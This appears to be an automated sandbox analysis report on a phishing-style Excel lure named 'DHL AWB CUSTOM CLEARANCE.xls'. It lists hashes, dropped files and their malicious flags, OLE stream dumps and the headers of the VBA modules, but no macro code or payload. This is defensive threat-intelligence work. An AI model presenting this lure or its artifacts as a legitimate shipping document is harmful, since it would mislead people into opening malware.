                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Cannot read section info
                          Category:dropped
                          Size (bytes):1536
                          Entropy (8bit):1.267917815339349
                          Encrypted:false
                          SSDEEP:6:rl912N0xs+CFfJ0lX+lG8ElCl5XCB9Xh9X:rl3lKF2XanMClJCb7
                          MD5:421F5A91E00A79C62C4CD0F51A4FD279
                          SHA1:3C0E1906ADF310703DD27FEBDB95FE9E0EDC8EE6
                          SHA-256:D697C3A1159479378E4E99FE47AC0223A9501AC6D6D887DFFA3E92CDCF050ED2
                          SHA-512:31709582EBD898D745E931FD0662DD4A35BAC20C3FFA56AEA79B431B0723DF4459B3B684F919D7B97ED58B7B7F3525280BB741BA3D705DC8D1B0244DF9D645B9
                          Malicious:false
                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):339968
                          Entropy (8bit):7.563689053502322
                          Encrypted:false
                          SSDEEP:6144:Ik3hbdlylKsgwyzcTbWhZFVE+WaxHA8JycxdI2rHJFZpLcriO5nzdbNih7FnOIbF:RJTxdI2z/A+OZzdbNih7FnRMOoBW3
                          MD5:1C6B376BA216A9BB0D2FC36DF5D4F5B6
                          SHA1:6C1C82703C034A915F8A3B9F77DBB87FFA93B60D
                          SHA-256:01A24E6317DF71BC97C054649BEB3A7B7B3119EEAEB1FAF42B734DA5102EC1A2
                          SHA-512:0AC92EE7ACBC63961D101FBA7349960BAEEB66F97DBD3A0CBD5751FF3DDE951AAF9D7375A23E45A3B8FFB39EE2042E40FEC4147AA96BF19733AFA533BB1EF3EA
                          Malicious:false
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 18:23:01 2025, Security: 1
                          Category:dropped
                          Size (bytes):892416
                          Entropy (8bit):7.642016073096629
                          Encrypted:false
                          SSDEEP:24576:wpbl/Az1dbIXRM9kV9u3bVmbARM8kAzLnCo:sbpAMX+qV9u3bVbQSL
                          MD5:A36352D8214891E340D3890675787D74
                          SHA1:34636842D918682D9CF79C3F79AC29FD88AAB0EB
                          SHA-256:EF6F4DC69382E199960CE3BFEA669E67E65A50AFEEA54426ECFD373037EBB3BA
                          SHA-512:456E5EF267BBB3F41D995C88B72F756F65A16E2DDED6BEBEAFE0A119D09A191E6BF3F98B8139B9FC12600667960A6A327A474F6065B78B6CACBC5CE9D50CCB92
                          Malicious:false
                          Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 18:23:01 2025, Security: 1
                          Category:dropped
                          Size (bytes):892416
                          Entropy (8bit):7.642016073096629
                          Encrypted:false
                          SSDEEP:24576:wpbl/Az1dbIXRM9kV9u3bVmbARM8kAzLnCo:sbpAMX+qV9u3bVbQSL
                          MD5:A36352D8214891E340D3890675787D74
                          SHA1:34636842D918682D9CF79C3F79AC29FD88AAB0EB
                          SHA-256:EF6F4DC69382E199960CE3BFEA669E67E65A50AFEEA54426ECFD373037EBB3BA
                          SHA-512:456E5EF267BBB3F41D995C88B72F756F65A16E2DDED6BEBEAFE0A119D09A191E6BF3F98B8139B9FC12600667960A6A327A474F6065B78B6CACBC5CE9D50CCB92
                          Malicious:true
                          Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 07:45:52 2025, Security: 1
                          Entropy (8bit):7.76698927706814
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:DHL AWB CUSTOM CLEARANCE.xls
                          File size:1'275'904 bytes
                          MD5:3954d9504039a8711e3ab29115d8054f
                          SHA1:d0f3ceaf0393dd82d12b66dfcf5144ea1413e31d
                          SHA256:26b53cef2e34ea99b37ad6e84736eeaa1851043d98b85ce831c946674b1ad1d8
                          SHA512:eabc02fdaea0aa342282ce7c94c7d5b47bd8124e3b397ca376a05fe87ab4d46f5b071f0757e04295acaf201349822e41c690266640a58f5a34f8ec2e8c04b40b
                          SSDEEP:24576:tkefLKSXea3tjAb1ZbcPBsTYGn3bV5bARM8CzdmRNy7Ei2tO8jS30B+fG71j:6efLKQ53lgkP28Gn3bVCUmzyYtJSQ+OB
                          TLSH:E745F1C3A68D8F42C91943307AB35BAD07159D07D95262BB22F4771E6BF72C04A83F5A
                          File Content Preview:........................>.......................................................................................................m.......o.......q.......s......................................................................................................
                          Icon Hash:35ed8e920e8c81b5
                          Document Type:OLE
                          Number of OLE Files:1
                          Has Summary Info:
                          Application Name:Microsoft Excel
                          Encrypted Document:True
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:True
                          Code Page:1252
                          Author:
                          Last Saved By:
                          Create Time:2006-09-16 00:00:00
                          Last Saved Time:2025-01-14 07:45:52
                          Creating Application:Microsoft Excel
                          Security:1
                          Document Code Page:1252
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:786432
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf 73 b6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet1"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                          VBA File Name:Sheet2.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf c3 4d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet2"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                          VBA File Name:Sheet3.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf 10 9e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet3"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook.cls
                          Stream Size:985
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf 70 1e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "ThisWorkbook"
                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.889430592781307
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:200
                          Entropy:3.250350317504982
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . U X f . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                          General
                          Stream Path:MBD00438E0E/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:99
                          Entropy:3.631242196770981
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0E/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:94980
                          Entropy:7.802479148242989
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . M v j . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 19 4d 76 6a ba 01 00 00 38 07 00 00 13 00 d9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.701136490257069
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                          General
                          Stream Path:MBD00438E0F/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:220
                          Entropy:3.3813251513223976
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:MBD00438E0F/MBD000673C0/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD000673C0/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:17987
                          Entropy:7.459551056433264
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD00083EA7/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD00083EA7/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:14238
                          Entropy:7.30552548787177
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD000846C9/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD000846C9/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:708
                          Entropy:3.6235698530352805
                          Base64 Encoded:True
